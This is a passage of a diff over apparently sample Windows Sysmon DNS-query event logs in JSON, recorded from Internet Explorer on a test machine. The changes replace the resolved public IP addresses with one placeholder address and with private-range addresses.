nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "level": "information", @@ -6802,7 +6802,7 @@ "ProcessId": "2736", "QueryName": "tps618.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -6837,7 +6837,7 @@ "ProcessId": "2736", "QueryName": "dpm.demdex.net", "QueryStatus": "0", - "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;", + "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.090" }, 
@@ -6855,7 +6855,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6867,7 +6867,7 @@ { "@timestamp": "2021-05-05T15:30:51.710Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6896,7 +6896,7 @@
 "ProcessId": "2736",
 "QueryName": "secure.adnxs.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;"
+ "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;"
 },
 "event_id": "22",
 "provider_name": "Microsoft-Windows-Sysmon",
@@ -6913,7 +6913,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6939,7 +6939,7 @@ "event_data": { "QueryName": "tps.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.478", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6955,7 +6955,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, 
@@ -6965,7 +6965,7 @@
 "event_data": {
 "QueryName": "i.liadm.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:08.536",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -6998,7 +6998,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
@@ -7015,7 +7015,7 @@
 "time_created": "2019-07-18T03:34:09.067Z",
 "level": "information",
 "event_data": {
- "QueryResults": "::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;",
+ "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:08.544",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -7038,7 +7038,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7050,7 +7050,7 @@
 "ProcessId": "2736",
 "QueryName": "router.infolinks.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
